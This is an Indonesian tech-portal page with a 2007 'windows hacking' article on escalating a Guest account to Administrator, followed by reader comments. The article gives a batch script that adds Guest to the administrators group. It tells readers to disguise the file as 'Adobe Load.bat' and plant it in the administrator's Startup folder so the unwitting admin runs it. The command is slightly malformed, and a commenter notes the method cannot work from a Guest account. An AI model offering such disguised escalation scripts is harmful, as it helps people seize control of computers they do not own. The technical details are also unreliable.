Teknisoft | Portal Komunitas Teknologi Informasi dan Pemrograman ©

Teknisoft

Senin, 25 September 2017 | User Login : Anonimous Home | Recommend | Free E-Mail | About | Contact Us

Main Menu
Download
Web Links
Buku Tamu
Rubrik
Kirim Artikel
WebMail
About
Contact Us
Lisensi Artikel
Donasi
Rubrik
Pemrograman
Networking
Security dan Virus
Hacking
Internet dan Komputer
Linux dan Open Source
Windows
Aplikasi Server
Mobile & Gadget
Login

Username
Password

Register
Forgot Password
Partner Site

BengkelProgram
Link Exchange
Online Support




VoIP Online

Dari Guest Menjadi Administrator

Minggu, 22 Juli 2007 - oleh : Admin

Baiklah tulisan sekarang kita akan coba windows hacking sederhana (mungkin cara ini sudah banyak yang tahu), adapun yang akan kita bahas yaitu bagaimana mendapatkan posisi dari user biasa atau Guest menjadi administrator, karena seperti kita ketahui jika dalam windows XP atau Windows 2000 posisi kita sebagai user biasa (limited account) ataupun hanya seorang Guest, kita tidak bisa melakukan apa-apa seperti install apalagi merubah system. Meskipun demikian kita dapat melakukan “kudeta” untuk mendapatkan posisi sebagai Administrator. Oleh karena posisi yang paling rendah adalah Guest; katakanlah kita hanya bisa menggunakan computer sebagai Guest.
Sebenarnya kita dapat  melakukan pengecekan posisi user kita menggunakan perintah : net user nama_user atau jika Guest ketikan net user Guest atau net user untuk melihat seluruh user yang ada, supaya dapat berperan sebagai administrator, walaupun nama tetaplah Guest. Maka ketikan script dibawah ini menggunakan notepad:

@echo off
net localgroup Administrator Guest/add
exit



simpanlah file tersebut dengan nama yang tidak mencurigakan administrator asli. Misalnya. Adobe Load.bat, ingat ekstensinya harus .BAT.  letakan file tersebut pada folder startup user administrator yaitu di : C:\Documents and Settings\Administrator\Start Menu\Programs\Startup. Selanjutnya kita tinggal menunggu sang administrator menjalankan computer atau merestart computer untuk menjalankan file Adobe Load.bat yang telah dibuat. Jika berhasil memasang perangkap tersebut, periksa kembali status user dengan mengetikan net user atau net user Guest di command prompt. Coba lihat pada bagian Local Group Memberships, kini anda menyandang dua jabatan sekaligus. Yaitu sebagai Guest sekaligus sebagai administrator.
Selamat Mencoba :D

kirim ke teman | versi cetak

Artikel Hacking Lainnya

Grab Speedy Alert System
Hacking Menggunakan DOS
Tips: Menjebak Hacker

Komentar Pengunjung

jadi d protect
Kamis, 08 Nopember 12 - oleh : wawaw
ko guestnya jadi pke password..apa passwordnya?


kaya mas bambang oke gw bingung
Rabu, 09 Juli 08 - oleh : wandi binun
yoi nulis di guest mo masuk folder admin sama juga DODOL, bang Napi eh Admin nulisnya di admin Acc kali ? ya gak usah pake bat bat segala kalo admin mah.


kaya mas bambang oke gw bingung
Rabu, 09 Juli 08 - oleh : wandi binun
yoi nulis di guest mo masuk folder admin sama juga DODOL, bang Napi eh Admin nulisnya di admin Acc kali ? ya gak usah pake bat bat segala kalo admin mah.


kalo gua sech pake dos
Kamis, 09 Agustus 07 - oleh : efun
ketik cmd pada menu run.
ketik 'net user' untuk melihat user account yg ada. *ga pake tanda petik.
keitk 'net user [nama user] [password] /add' untuk menambah user dengan password. kalo ga mau pake password ga usah pake password. *ga pake tanda [].
klo mo di del ganti aja /add jadi /del.
apabila berhasil muncul pesan The command completed successfully.


Gimana caranya mas
Senin, 23 Juli 07 - oleh : bambang oke
saya kok bingung sih,
Pas kita naruk tuh Adobe Load.bat ke C:\Documents and Settings\Administrator\Start Menu\Programs\Startup.
Status kita pada saat itu sebagai apa?
Kalo status kita sebagai guest kan ga bisa!
Malah keluar C:\Documents and Settings\Administrator is not accesible -- Access is Denied

Mohon pencerahannya


Your Name :
Your Email :
Comment's Title :
Comment :
Security Code : Security Code
Type Code :
Pencarian

cari di
Top Download
Video Tutorial Antena Kaleng 2.4 GHz (12827)
Tutorial Antena Kaleng (format PDF) (9724)
Membuat Mail Server Di Windows 2003 (6864)
PCLinuxOS 0.93a MiniME (ISO) (6791)
Source Code SKPL (6166)
File Instalasi SKPL (5813)
Komponen Inpout32 (5033)
Komponen Try Icon (4499)
Setting Dial-Up Internet di Linux Mandriva One 2007 (4303)
Boot Yahoo (3810)
Statistik
Visitors :564718 Org
Hits : 1146837 hits
Month : 527 Users
Today : 37 Users
Online : 1 Users
Banner Pilihan
E-Mail
wapsite
Dukung Situs Ini
Bank BCA
Bank Mandiri
Network : Teknisoft Network | Teknisoft | Travel & Tourism | Kampus SEO | Bumi Asri | Mikrotik Tutorial | Blogger Garut | Phone Cell Arena | IT Knowledge | Master SEO | Online Terus | Garut Online | Chocodot

Copyright © 2005-2008 Teknisoft All Right Reserved
Syndication Feed RSS2.0